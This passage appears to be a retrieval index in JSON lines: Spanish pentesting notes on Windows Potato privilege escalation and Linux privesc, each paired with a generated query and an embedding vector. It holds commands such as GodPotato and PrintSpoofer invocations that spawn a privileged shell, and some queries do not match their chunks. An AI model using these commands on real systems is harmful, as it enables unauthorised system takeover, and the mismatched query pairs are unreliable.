0.05031, -0.04027, 0.04059, -0.06512]} +{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## El gatillo\n```\nwhoami /priv β†’ busca SeImpersonatePrivilege = Enabled\n```\nTΓ­pico en cuentas de servicio (IIS, MSSQL `sa`, etc.).", "indexar": "quΓ© comando uso para ver la configuraciΓ³n del privilegio SeImpersonatePrivilege", "v": [-0.16673, 0.06649, -0.07751, -0.12688, 0.12464, -0.10712, 0.08838, -0.13323, -0.16614, -0.082, -0.04181, -0.0103, 0.0224, -0.11028, 0.03174, 0.04295, 0.1372, -0.11293, 0.00464, -0.02306, 0.06744, 0.00705, 0.07806, 0.01101, -0.02209, 0.03184, 0.19703, -0.03437, -0.14427, -0.02815, 0.01405, 0.09218, 0.00338, -0.11265, 0.06986, 0.04207, -0.02003, 0.02143, -0.0077, 0.18466, 0.11277, -0.09629, -0.07991, 0.03748, 0.05423, -0.06929, 0.01972, 0.0459, 0.06205, 0.00994, 0.01001, 0.02114, 0.06013, -0.01634, 0.03388, 0.09426, 0.03429, 0.0074, -0.00785, 0.00748, -0.07926, -0.09225, 0.05224, 0.15634, -0.00336, -0.03298, -0.01321, -0.07707, 0.00177, -0.0521, -0.07265, -0.06712, -0.11676, 0.00268, 0.036, 0.01475, -0.0218, 0.00477, 0.12717, -0.03991, -0.02638, 0.05087, -0.12458, 0.07927, -0.09858, -0.01667, 0.06865, -0.01163, -0.02803, -0.00132, 0.03642, -0.01198, 0.02071, -0.0448, 0.04944, -0.00366, -0.04783, 0.1264, 0.09707, 0.06794, 0.13263, -0.02297, -0.03635, 0.19544, 0.07048, 0.04976, 0.05145, -0.15393, -0.04938, -0.04829, -0.04103, -0.08141, 0.04275, -0.00667, -0.01803, -0.02712, 0.016, -0.08581, -0.02209, -0.06522, -0.10085, -0.0321, 0.06557, 0.02427, 0.09312, -0.04828, -0.04396, 0.02769, 0.04961, 0.03917, -0.07839, -0.03863, 0.06, -0.06371, 0.01949, 0.11419, -0.07059, -0.05163, -0.05156, -0.09503, 0.0585, 0.00628, -0.0208, -0.00537, 0.03929, -0.03975, 0.03684, -0.05213, -0.04482, 0.00701, -0.00903, 0.01215, 0.02902, 0.03788, 0.00118, 0.02431, -0.11143, -0.0178, 0.00723, -0.00645, -0.04455, -0.06349, -0.0291, 0.04238, 0.06269, -0.04763, -0.02348, -0.10508, -0.02094, -0.02235, -0.00821, -0.02838, -0.01841, 0.01266, -0.0352, -0.09376, -0.01756, 0.07234, 0.03966, 0.03855, -0.03375, 0.01268, 0.01182, -0.02516, -0.03506, -0.00812, -0.05356, 0.03131, 0.01477, 0.01889, -0.02909, 0.1359, 0.04273, -0.03074, -0.01694, -0.02378, -0.03881, 0.01624, -0.06229, 0.01742, 0.01141, 0.10237, -0.01966, -0.05196, -0.01967, -0.04153, -0.01616, -0.00071, -0.07124, 0.06398, -0.0058, -0.00043, 0.04385, -0.02867, -0.02652, 0.03546, 0.07021, -0.02479, -0.02818, -0.02766, 0.05577, 0.04676, 0.03293, -0.02163, 0.05331, 0.02305, -0.03139, -0.0058, 0.10273, 0.00977, -0.03652, -0.0071, 0.02712, -0.0608, 0.04619, 0.06298, 0.04864, 0.02684, -0.00278, -0.04216, 0.01812, 0.1009, -0.02513, -0.10358, -0.01591, -0.10526, -0.08954, 0.00705, -0.00695, -0.02923, 0.04663, 0.00274, 0.00693, -0.02886, -0.03631, -0.03015]} +{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## El gatillo\n```\nwhoami /priv β†’ busca SeImpersonatePrivilege = Enabled\n```\nTΓ­pico en cuentas de servicio (IIS, MSSQL `sa`, etc.).", "indexar": "cΓ³mo detectar si un servicio estΓ‘ usando impersonaciΓ³n de usuario", "v": [-0.17648, 0.14383, -0.12164, -0.23496, 0.04336, -0.14054, -0.15885, -0.04629, 0.00233, -0.06852, -0.15499, -0.07143, -0.13582, -0.03916, -0.00149, -0.10962, 0.11911, 0.00819, 0.06439, -0.05738, 0.01708, 0.02514, 0.0142, -0.00653, -0.05125, 0.00918, 0.03861, -0.20793, -0.04426, -0.02131, 0.00875, -0.12123, 0.02888, -0.00298, -0.1161, -0.08034, -0.06784, -0.03214, 0.02999, 0.14502, 0.09393, 0.02249, -0.09691, 0.03727, 0.0325, 0.10394, -0.05955, -0.12621, -0.01535, 0.04997, 0.00501, -0.04278, -0.19932, -0.04166, -0.0533, -0.02644, 0.06716, -0.0529, 0.06899, -0.07785, -0.00192, -0.01385, 0.01595, 0.15608, 0.05484, -0.0958, -0.00476, -0.0136, -0.03559, -0.04685, 0.00957, -0.02435, -0.01475, 0.04552, 0.10643, 0.09229, 0.02671, -0.00492, 0.14238, -0.02472, -0.0232, 0.00048, -0.01794, 0.07062, -0.1346, -0.00032, 0.10296, -0.0035, 0.04092, -0.12316, 0.05897, 0.11797, 0.02135, -0.00921, 0.0295, 0.00303, 0.10524, -0.08994, -0.01503, 0.00085, 0.12314, -0.01949, -0.05842, 0.15616, -0.02398, -0.03778, 0.0315, -0.06179, -0.09833, -0.11947, 0.00016, -0.01992, -0.03427, -0.08145, -0.05793, 0.04561, 0.04496, -0.1221, -0.0177, 0.01005, -0.09524, 0.01411, 0.06315, -0.08634, 0.0447, -0.09368, -0.00367, 0.03806, 0.00752, -0.05959, -0.03049, -7e-05, -0.02855, -0.01941, 0.01001, 0.02048, -0.03207, -0.07281, -0.07413, 0.04112, 0.03412, 0.04841, -0.00639, 0.03199, 0.08466, -0.00787, 0.02351, -0.06118, -0.0803, 0.00133, 0.02358, -0.01198, -0.0817, 0.01721, -0.04897, -0.04066, -0.01604, -0.08204, -0.04617, -0.00239, -0.02684, -0.02842, 0.02823, 0.01081, 0.0392, -0.03859, 0.06507, -0.01368, 0.10515, -0.01575, -0.01678, -0.01991, -0.03769, -0.04942, 0.04979, 0.01699, -0.01866, 0.01995, 0.01841, -0.00551, -0.04394, -0.05795, 0.00932, -0.06727, -0.00993, -0.02185, -0.03149, -0.0021, -0.00041, 0.00814, 0.03716, 0.01071, 0.00125, 0.02966, 0.07875, -0.0252, 0.00405, 0.00614, -0.00972, -0.04889, -0.03954, -0.00296, 0.00811, 0.04774, -0.04507, -0.05285, -0.00901, -0.00187, 0.0203, 0.01442, 0.03764, 0.00342, 0.07462, -0.03887, -0.08664, 0.0165, 0.00269, 0.00238, -0.01524, -0.00178, -0.03359, 0.0096, 0.01571, 0.01996, -0.02238, 0.01354, 0.02627, -0.0318, 0.04681, 0.05496, 0.03235, 0.02943, -0.00556, -0.00609, -0.00562, -0.03758, 0.02876, -0.00109, -0.03566, -0.09256, 0.04714, 0.10478, -0.04184, -0.00715, 0.02286, -0.01688, -0.03449, 0.01178, -0.02927, -0.03834, 0.00335, 0.01178, 0.07802, -0.05746, 0.02634, -0.0167]} +{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## La familia\n```\nJuicyPotato β†’ Windows antiguos\nPrintSpoofer β†’ Windows 10/Server 2016-2019 (servicio de impresiΓ³n)\nGodPotato β†’ moderno, muy fiable hoy\nRoguePotato / RottenPotato β†’ variantes\n```", "indexar": "quΓ© programa sirve para capturar la pantalla en Windows 10?", "v": [0.04377, 0.00898, -0.07297, -0.16508, 0.02991, -0.13663, -0.00749, -0.04193, 0.04734, -0.08788, 0.01366, -0.0807, -0.03381, -0.07631, -0.10335, 0.03487, 0.01223, -0.01172, 0.05166, 0.01956, -0.02052, 0.01696, 0.00385, -0.06679, -0.0716, -0.00784, 0.02713, 0.01142, -0.08974, -0.09752, 0.00175, 0.00726, 0.01974, -0.06402, -0.00899, -0.01947, -0.00711, 0.03979, 0.01922, 0.05435, 0.07946, 0.18096, -0.02625, 0.04036, 0.07066, -0.02395, 0.1562, 0.02405, 0.04372, -0.04326, -0.05384, 0.04905, -0.00653, -0.02479, 0.03549, -0.03578, 0.04849, -0.08417, 0.03225, 0.02941, 0.01313, 0.04186, -0.02469, -0.02416, -0.00384, -0.0612, 0.06045, 0.03174, 0.00664, 0.06203, 0.01457, 0.02466, 0.13431, 0.03893, 0.01278, 0.07882, -0.11197, -0.09036, 0.12574, -0.08054, 0.01734, 0.00301, -0.03757, -0.07197, -0.0869, -0.05924, -0.02876, -0.01171, -0.04511, -0.19899, 0.03716, -0.00917, -0.03172, 0.08582, 0.04255, -0.08548, 0.04813, 0.03629, 0.0074, 0.13854, 0.01264, -0.18627, -0.1095, 0.05347, -0.11916, 0.12217, 0.00337, -0.10733, -0.10868, 0.04822, -0.02557, 0.03259, -0.09599, 0.0484, -0.12564, -0.01662, 0.00446, -0.10878, 0.02921, 0.01491, -0.11164, 0.09191, -0.05341, -0.08983, 0.10873, -0.00072, -0.0472, 0.10882, -0.07987, 0.04303, 0.03709, 0.02594, -0.0073, 0.02024, -0.10138, -0.07441, 0.11513, 0.00681, -0.02172, -0.1405, 0.05153, 0.05039, 0.03852, -0.0635, 0.02875, 0.02532, 0.12698, 0.04961, -0.07136, 0.05578, 0.06405, -0.04101, -0.02602, 0.00823, -0.04544, 0.0033, 0.02058, 0.06704, -0.03502, 0.02024, 0.02642, -0.04842, -0.03479, -0.04607, 0.04438, -0.02458, -0.03457, 0.01307, 0.07377, 0.0192, -0.0071, 0.06406, -0.01269, -0.08549, -0.03225, 0.01907, 0.06696, -0.0188, -0.0239, -0.07349, -0.10623, 0.08975, 0.11541, 0.00479, -0.00189, 0.02247, -0.07139, 0.01835, -0.04767, -0.00656, -0.06223, -0.03527, 0.03012, -0.03456, -0.01241, -0.07427, -0.03049, 0.04504, 0.10857, 0.02848, 0.01986, -0.03404, 0.03902, -0.03022, 0.10442, 0.04068, -0.03019, 0.07474, 0.08975, 0.07333, -0.03593, 0.04569, 0.02133, -0.03502, -0.01936, -0.11983, 0.06998, 0.02443, 0.04309, 0.04813, 0.06247, 0.00166, 0.01029, 0.09363, -0.03552, -0.06673, -0.03015, 0.03084, -0.01137, -0.03138, -0.01109, 0.02411, -0.00843, -0.0056, -0.03906, 0.0183, -0.00644, -0.05762, -0.05014, -0.04813, -0.07927, 0.08607, -0.04651, -0.07463, -0.03156, 0.00191, 0.0171, 0.0287, 0.051, -0.07876, -0.05903, 0.00975, 0.03208, -0.02728, 0.0096, 0.13862]} +{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## La familia\n```\nJuicyPotato β†’ Windows antiguos\nPrintSpoofer β†’ Windows 10/Server 2016-2019 (servicio de impresiΓ³n)\nGodPotato β†’ moderno, muy fiable hoy\nRoguePotato / RottenPotato β†’ variantes\n```", "indexar": "cual es una herramienta gratuita y confiable para grabar lo que se ve en mi ordenador?", "v": [0.142, 0.11257, -0.08095, -0.08852, 0.06288, -0.1187, -0.04899, 0.08187, -0.06848, -0.11441, 0.00966, -0.03587, -0.00257, -0.01185, 0.06878, 0.05851, 0.0269, -0.09539, -0.04174, 0.12045, 0.0367, 0.05367, -0.00729, -0.09467, -0.07176, -0.0519, 0.04527, -0.00189, -0.17193, 0.08299, 0.06993, 0.08086, 0.02044, -0.15454, -0.10163, -0.06613, 0.04631, -0.03539, 0.00506, 0.09301, 0.07014, 0.03255, -0.06145, 0.07106, 0.09659, -0.04556, 0.02512, -0.03242, 0.0351, 0.07589, -0.04991, -0.16343, -0.02382, -0.0088, -0.0269, -0.13295, 0.19187, -0.1174, 0.08098, -0.09178, -0.0871, 0.07418, -0.01964, -0.00262, -0.00321, -0.02733, 0.01493, -0.01037, -0.15087, 0.01926, -0.01409, 0.08015, -0.00647, -0.00621, 0.0133, -0.01182, -0.02024, -0.07247, 0.09383, 0.02105, 0.04769, -0.07188, -0.0195, 0.02645, -0.12728, -0.01537, 0.08977, -0.03972, -0.00772, -0.01834, 0.04715, 0.09822, -0.05834, 0.07984, 0.07913, -0.07181, 0.17917, 0.10481, -0.0147, -0.00507, 0.11287, -0.04038, -0.08782, 0.11308, -0.04603, 0.07685, 0.00815, -0.01843, 0.01085, -0.01955, 0.06428, 0.09439, -0.05739, -0.00734, -0.08766, -0.0105, 0.01774, -0.07204, -0.05175, 0.00552, 0.03425, 0.06242, -0.07868, -0.08344, -0.04948, -0.00592, -0.06027, 0.05222, -0.0495, -0.00651, -0.01204, -0.02736, -0.04097, -0.02441, -0.01819, -0.01973, 0.01457, -0.12634, 0.01132, -0.09988, 0.00725, 0.08497, 0.01582, -0.08978, 0.05947, 0.02201, 0.03747, -0.04853, -0.06365, -0.03117, -0.01609, 0.03702, -0.0257, 0.04327, -0.02714, 0.07726, 0.02577, -0.0194, -0.10507, 0.01208, -0.00523, -0.00321, 0.0926, -0.02642, 0.00126, -0.03469, -0.00897, -0.00724, 5e-05, 0.05204, -0.02896, 0.00878, 0.05418, -0.06288, 0.00978, -0.08232, -0.03742, -0.02736, 0.01578, -0.10933, -0.04486, 0.11637, -0.00945, 0.01076, -0.01481, 0.00418, 0.01096, 0.01155, 0.02348, 0.01734, 0.02151, 0.00406, -0.04491, -0.03477, 0.01418, -0.04921, -0.09207, -0.04694, 0.04245, 0.02172, -0.1072, -0.04965, -0.11506, -0.0434, 0.04495, 0.03466, -0.08938, -0.02731, -0.01698, 0.0233, -0.00902, 0.03766, -0.0088, -0.05739, -0.0235, -0.03448, 0.05705, -0.01055, -0.03796, -0.01302, 0.07633, 0.02504, 0.1278, -0.02436, -0.03384, 0.00647, 0.03752, 0.01815, -0.01266, -0.02801, 0.0041, 0.01135, -0.0567, -0.06195, 0.01445, 0.01086, 0.03526, -0.04335, -0.08602, -0.04764, 0.01978, 0.10282, -0.02709, -0.09297, -0.02843, -0.0285, -0.06708, 0.02833, -0.04768, -0.14955, -0.04045, 0.0323, 0.08116, -0.01234, 0.03579, -0.02226]} +{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Uso tΓ­pico (GodPotato/PrintSpoofer)\n```\nGodPotato.exe -cmd \"cmd /c whoami\"\nPrintSpoofer.exe -i -c cmd\n```\nSubes el .exe con Transferencia de ficheros.", "indexar": "que programa puedo usar para ejecutar comandos como whoami desde una ventana de sistema?", "v": [0.07064, 0.10468, -0.08935, -0.1318, 0.00371, -0.05335, 0.02485, -0.08463, -0.11744, -0.13723, -0.14981, -0.06259, -0.00389, -0.05893, -0.06184, 0.06614, 0.13853, -0.05366, 0.01016, -0.04649, 0.00605, -0.09016, 0.01255, -0.02216, -0.05277, 0.1077, 0.06434, -0.06617, -0.10018, -0.10968, -0.0378, 0.01259, 0.13176, -0.16543, -0.02527, -0.00642, -0.03124, 0.03258, 0.02813, 0.16504, 0.00959, 0.04764, -0.11588, 0.03709, 0.07099, -0.02873, 0.08447, -0.05288, 0.0416, -0.11278, -0.06868, -0.03109, -0.10935, 0.00155, 0.06948, -0.13599, 0.07893, -0.12282, -0.0501, 0.03648, 0.02861, -0.03841, 0.0411, 0.03113, 0.0184, -0.05202, -0.00327, -0.10602, -0.04093, 0.11319, -0.07725, 0.02861, -0.02848, 0.09547, 0.02924, 0.02236, -0.06678, -0.08132, 0.10505, -0.03491, -0.0693, 0.01491, -0.08485, 0.06649, -0.03172, -0.10344, 0.00063, -0.03712, -0.01957, -0.04818, 0.01019, -0.03754, 0.02319, 0.05855, 0.11456, -0.02078, 0.00429, 0.03388, 0.03638, -0.02424, 0.07855, -0.1292, -0.08244, 0.14748, -0.00054, 0.03771, 0.05218, -0.06011, 0.00447, -0.0389, -0.03914, -0.09219, -0.03077, -0.07832, -0.11182, -0.05778, -0.03801, -0.07125, 0.0353, -0.07456, -0.09807, 0.04067, -0.05654, 0.01619, 0.14077, -0.04041, -0.03926, 0.10941, -0.01204, 0.09785, -0.03471, 0.01182, 0.03375, -0.047, -0.06536, 0.01565, 0.00085, -0.02756, -0.02611, -0.13692, 0.03664, 0.08773, 0.03191, -0.01802, 0.07821, -0.00514, 0.01647, -0.07, -0.0411, -0.0169, 0.05429, 0.0508, -0.06225, 0.03542, -0.06176, -0.04319, 0.02078, -0.00102, -0.03327, 0.03467, -0.07598, -0.01326, -0.02814, 0.00704, 0.08978, -0.0695, -0.01456, -0.02853, 0.04589, 0.08796, 0.02903, 0.09687, 0.04526, -0.02778, 0.05429, -0.06343, -0.04478, -0.05281, 0.01752, 0.02843, -0.09317, 0.08278, 0.00273, -0.01127, -0.03165, -0.01835, -0.02554, 0.03873, -0.02025, 0.02723, -0.00671, 0.07273, 0.0057, -0.0348, -0.01935, 0.00434, 0.00712, -0.02329, -0.02708, -0.05127, -0.10614, 0.0573, 0.04695, -0.07817, 0.05982, 0.06404, -0.01367, 0.06056, 0.06333, 0.11825, 0.04433, -0.01541, 0.07161, 0.04283, -0.06831, -0.02315, 0.00087, 0.05161, 0.01466, -0.03078, 0.02741, 0.0096, 0.056, 0.04224, 0.026, -0.07297, -0.01353, 0.03605, 0.00051, -0.0117, -0.04237, -0.07623, 0.03482, -0.04624, 0.03342, -0.03226, -0.01965, -0.02596, -0.01197, -0.06829, -0.01968, 0.10359, 0.01795, -0.08023, -0.01634, -0.04442, -0.12695, 0.00651, 0.00565, -0.05697, -0.03308, 0.07181, 0.02758, -0.05653, -0.00269, 0.00521]} +{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Uso tΓ­pico (GodPotato/PrintSpoofer)\n```\nGodPotato.exe -cmd \"cmd /c whoami\"\nPrintSpoofer.exe -i -c cmd\n```\nSubes el .exe con Transferencia de ficheros.", "indexar": "hay alguna herramienta que permita abrir la consola de administrador fΓ‘cilmente?", "v": [-0.06667, 0.11538, -0.22244, -0.2023, -0.09189, -0.18492, -0.00506, -0.08513, -0.19039, -0.11096, -0.10987, -0.01922, 0.03256, -0.05311, 0.10337, -0.00118, 0.12887, -0.10546, -0.00493, 0.04633, 0.03409, 0.06096, -0.04851, -0.03009, -0.022, -0.05755, 0.10032, -0.04914, -0.08653, -0.05274, -0.04048, -0.04415, 0.0785, 0.00047, -0.01108, -0.03225, -0.00796, -0.02556, 0.06876, -0.00749, 0.03884, 0.03388, -0.07622, 0.06281, 0.07843, -0.04011, 0.01402, 0.0105, 0.01657, 0.04387, -0.00876, -0.21911, -0.0661, -0.05456, 0.12476, -0.04421, 0.13274, -0.06012, 0.0992, -0.04367, -0.07728, 0.06169, 0.08082, 0.03346, -0.07982, 0.02931, 0.0489, -0.11221, -0.09032, 0.12091, -0.14171, -0.03644, -0.01089, 0.08209, -0.00662, 0.02607, -0.1151, 0.01542, 0.0692, 0.02999, 0.07982, -0.07908, -0.04907, -0.06756, -0.03825, -0.11483, 0.02281, -0.02422, 0.04632, -0.0616, -0.0276, -0.0359, -0.03745, 0.03311, 0.05676, -0.05452, 0.08656, 0.04661, -0.03771, 0.02004, 0.10922, 0.00293, -0.06736, 0.08754, -0.08087, 0.00845, -0.00996, -0.09685, -0.02873, -0.01368, 0.03845, 0.05216, -0.0197, 0.03452, -0.02614, 0.06386, -0.11443, -0.01987, -0.00048, -0.03377, 0.03156, -0.0338, -0.01696, -0.00627, -0.01597, -0.05253, -0.04519, 0.08192, 0.00387, -0.03163, -0.07166, -0.13382, -0.02366, 0.05346, -0.04338, 0.01584, -0.05775, -0.06034, 0.01235, -0.07329, -0.04477, 0.07285, 0.02895, -0.16654, 0.12023, 0.00402, -0.00837, -0.02798, -0.05879, -0.0083, 0.06006, -0.02601, 0.05017, 0.06782, 0.00698, 0.08884, 0.0518, 0.05889, -0.06396, 0.03923, -0.04543, -0.02473, -0.03508, 0.01553, -0.04334, -0.05322, -0.04809, 0.04014, 0.0797, -0.03092, -0.03289, 0.04083, 0.05881, 0.05924, 0.01355, -0.03896, -0.07463, -0.0004, 0.00304, -0.08663, 0.01111, 0.01048, -0.03043, -0.0329, -0.1031, -0.08013, -0.01094, -0.05428, -0.06953, 0.01231, 0.08584, 0.03428, -0.0105, -0.0925, 0.06593, 0.0167, 0.01265, -0.06044, -0.02875, -0.00749, 0.00916, -0.00153, -0.04384, -0.0759, 0.01746, 0.01595, -0.02047, -0.00015, 4e-05, 0.01277, 0.05226, 0.04771, 0.0306, 0.02061, 0.03823, -0.03221, 0.00624, 0.04446, -0.01346, -0.0324, 0.02608, 0.02004, 0.0702, -0.04119, 0.03645, -0.02481, -0.01625, 0.01881, 0.01536, -0.03474, 0.01631, -0.01472, 0.02631, -0.0008, 0.01107, -0.04532, 0.08326, -0.07174, 0.00558, 0.03586, 0.00047, 0.01155, 0.04164, -0.05458, -0.05724, -0.05907, 0.01067, -0.01589, -0.05536, -0.08314, -0.00583, -0.01963, 0.01186, -0.04767, -0.0359, 0.00051]} +{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Privesc Linux\n\n> Tras el foothold (Reverse shell + Estabilizar shell TTY): script automatizado (PEASS-ng) **+** revisiΓ³n manual. Paso 4 de la MetodologΓ­a OSCP.", "indexar": "quΓ© herramienta sirve para automatizar el paso 4 de la metodologΓ­a OSCP?", "v": [0.01059, -0.03823, -0.09144, -0.23142, -0.02362, -0.17776, -0.0558, -0.07819, -0.08149, -0.00597, -0.03352, -0.06934, 0.05673, -0.02228, 0.06809, 0.03265, 0.13719, -0.09836, -0.03238, 0.08003, -0.04524, -0.06128, -0.09306, -0.05594, -0.011, 0.13801, 0.08584, -0.08263, -0.25926, -0.00266, -0.03889, 0.05718, 0.0032, 0.00778, -0.0726, -0.05991, -0.02284, -0.02095, -0.05293, 0.11659, -0.07697, 0.05911, -0.01547, 0.12165, 0.18922, -0.01494, 0.02019, 0.08575, -0.00164, 0.1063, -0.04619, -0.15968, -0.08374, -0.03797, -0.05478, -0.10303, 0.11079, -0.08027, 0.04322, -0.10889, -0.04333, 0.0142, -0.08711, -0.03901, -0.00278, -0.09015, -0.01087, -0.0863, -0.05949, 0.09454, 0.03374, 0.05235, -0.04408, 0.00115, 0.02836, 0.02415, 0.01983, 0.0641, 0.12418, -0.00204, 0.07102, -0.03089, -0.06762, 0.0283, -0.02518, -0.01494, 0.13425, -0.00873, -0.01896, -0.10771, -0.04961, 0.06059, 0.04288, -0.03117, 0.0422, -0.04263, 0.06615, -0.05367, 0.00753, 0.00936, 0.11445, -0.02426, -0.07801, 0.09997, -0.01297, 0.01783, 0.05259, -0.01625, -0.01107, -0.04954, 0.03401, 0.07129, 0.0014, 0.06342, -0.05175, -0.00437, 0.06613, 0.00058, -0.05398, -0.05739, -0.02685, 0.08267, -0.07252, -0.04565, 0.00576, 0.03685, 0.04542, 0.13103, 0.01544, -0.0897, 0.03563, -0.06533, -0.06768, 0.08732, -0.05029, -0.06098, -0.01083, -0.10108, -0.06508, -0.05243, 0.02958, 0.05794, -0.0305, -0.13732, 0.05748, -0.09505, 0.06316, -0.01788, 0.00559, 0.01592, 0.08381, -0.05152, 0.0262, -0.01259, -0.07961, -0.05243, -0.02258, 0.03346, -0.12511, 0.07946, 0.00704, -0.05899, 0.01408, 0.0364, -0.01069, -0.00351, 0.04393, -0.00781, 0.01226, 0.06371, 0.0583, 0.0579, 0.03128, -0.04696, -0.02317, -0.03023, -0.07209, 0.0093, -0.02036, 0.00623, -0.08589, -0.01924, -0.01343, -0.0838, 0.02528, 0.01889, 0.04543, -0.04197, 0.00582, 0.10059, -0.02105, -0.01995, -0.0172, -0.06715, -0.01707, 0.06536, 0.02243, -0.07259, 0.03243, 0.00351, -0.07, 0.00279, 0.0262, 0.01407, -0.03403, 0.09239, 0.03782, 0.02663, -0.02808, 0.06172, 0.0075, -0.03521, 0.05377, -0.01237, 0.00903, -0.03562, -0.01006, 0.04241, -0.04714, -0.00822, 0.10212, -0.05114, 0.01238, -0.02971, -0.03581, 0.07281, 0.03793, -0.01959, 0.03292, -0.05632, -0.03617, 0.01317, 0.00547, -0.01881, 0.02126, -0.04334, -0.01279, -0.03723, -0.0307, -0.0628, 0.07367, -0.00638, -0.05322, -0.04419, -0.06231, -0.04449, -0.03768, -0.01169, 0.04066, 0.00574, -0.0011, -0.02238, 0.04828, 0.00897, -0.03554, -0.01795]} +{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Privesc Linux\n\n> Tras el foothold (Reverse shell + Estabilizar shell TTY): script automatizado (PEASS-ng) **+** revisiΓ³n manual. Paso 4 de la MetodologΓ­a OSCP.", "indexar": "con quΓ© programa puedo revisar manualmente un shell estabilizado?", "v": [0.05071, 0.13169, -0.19541, -0.09306, 0.08542, -0.10525, -0.05154, -0.15872, -0.09981, -0.10017, -0.08349, -0.00791, 0.00685, -0.09389, 0.04264, 0.10653, -0.03835, -0.08148, -0.03214, 0.03377, 0.00782, -0.19087, -0.04187, -0.01357, 0.00372, 0.07354, 0.02423, 0.02613, -0.14976, -0.10367, 0.03317, -0.01009, 0.104, -0.10069, -0.03704, 0.10775, 0.08063, 0.02789, -0.02198, 0.09368, 0.00987, 0.00313, 0.03659, 0.03687, 0.12225, 0.00988, 0.05751, 0.01117, -0.05645, -0.00353, -0.01659, 0.0438, -0.02789, 0.02295, 0.06995, -0.06702, 0.18063, -0.1068, 0.06127, -0.03485, -0.03833, 0.0613, 0.0704, 0.0772, 0.02028, 0.06379, -0.01533, -0.06554, -0.09759, 0.09538, 0.05744, -0.00395, -0.01363, -0.01628, -0.0742, 0.01266, 0.02079, -0.03888, 0.08934, -0.05304, -0.08643, -0.05034, 0.04169, 0.15641, -0.0447, -0.11755, -0.07882, -0.11248, -0.09661, -0.04635, 0.04291, -0.13423, -0.00648, 0.08563, 0.00957, -0.01973, 0.11345, 0.01731, -0.05568, 0.03711, 0.07466, -0.06699, 0.01597, 0.1322, 0.04138, 0.02215, 0.06511, 0.04281, -0.05147, 0.09326, -0.01025, 0.02039, -0.06626, -0.00385, -0.06601, 0.0328, -0.07817, -0.06722, 0.03503, -0.0927, -0.04555, 0.01821, -0.07358, 0.01502, 0.03698, 0.00917, -0.01058, 0.16704, -0.0083, 0.04261, 0.01881, 0.03521, -0.03112, -0.05293, -0.00294, -0.00907, -0.05246, -0.02422, 0.0058, -0.03842, -0.02906, 0.10683, 0.07897, 0.06954, 0.09521, -0.03196, -0.03113, -0.03811, -0.01277, 0.05097, 0.05572, 0.07653, 0.06883, 0.06703, -0.02715, -0.01732, 0.01556, 0.01943, -0.04832, 0.02746, 0.01032, 0.0143, -0.01628, -0.02897, 0.03713, -0.07372, -0.04395, -0.00793, 0.0482, 0.00367, -0.06342, 0.03924, -0.01511, -0.03255, 0.00515, -0.02629, -0.01049, -0.06213, 0.05793, -0.0027, -0.03494, 0.04657, 0.04989, -0.03684, -0.02207, -0.05727, 0.0104, 0.05817, 0.05325, 0.02523, 0.03284, 0.05274, -0.05172, -0.01026, 0.02946, 0.00927, -0.05672, -0.0224, -0.04505, -0.02837, -0.01435, 0.06362, 0.04831, -0.07172, 0.09194, 0.03202, -0.06983, 0.05247, 0.08281, 0.10211, -0.01234, -0.0335, 0.10191, 0.03699, -0.0024, 0.03383, -0.03787, 0.00111, 0.02088, 0.06983, 0.01145, -0.03105, 0.15363, 0.04504, -0.01403, -0.06825, 0.07106, 0.03541, 0.00999, 0.07406, -0.03877, -0.01502, -0.00353, -0.04401, 0.07129, 0.02542, 0.04761, -0.05889, 0.01026, -0.01724, 0.04737, 0.09262, -0.03362, -0.08116, -0.02969, 0.01102, -0.05477, 0.01967, 0.00295, 0.00035, -0.06652, 0.06988, -0.00146, -0.08851, 0.04125, -0.02807]} +{"tipo": "pregunta", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Privesc Linux\n\n> Tras el foothold (Reverse shell + Estabilizar shell TTY): script automatizado (PEASS-ng) **+** revisiΓ³n manual. Paso 4 de la MetodologΓ­a OSCP.", "indexar": "quΓ© alternativa libre hay al script PEASS-ng para automatizar la fase final de una reverse shell?", "v": [-0.09037, -0.10497, -0.10573, -0.05326, -0.09408, -0.02823, -0.10072, -0.2059, -0.14211, 0.09865, -0.09648, -0.05607, -0.08471, 0.0322, 0.19394, -0.04528, -0.13004, -0.06567, 0.09731, 0.08183, -0.02545, -0.06174, -0.14413, -0.11855, -0.01374, 0.12943, 0.07785, 0.10662, -0.18794, -0.09442, -0.03551, -0.01712, 0.04214, -0.04457, 0.02477, 0.03349, 0.17659, 0.09854, 0.09085, 0.10862, 0.01668, -0.00293, -0.03225, 0.17055, 0.10196, -0.04186, 0.0103, 0.04509, 0.09641, 0.04173, -0.04383, -0.03488, -0.08335, 0.09595, 0.10402, 0.03214, 0.08032, -0.16269, -0.03187, -0.0925, -0.07188, 0.05135, -0.03171, 0.0229, 0.08051, 0.05691, 0.02413, -0.04464, 0.0355, 0.11574, 0.08655, -0.00089, 0.00959, 0.02201, -0.1383, 0.06239, -0.09939, 0.04862, -0.03362, -0.00185, -0.006, -0.0537, -0.02309, 0.09728, 0.07482, -0.08218, -0.02839, -0.08111, 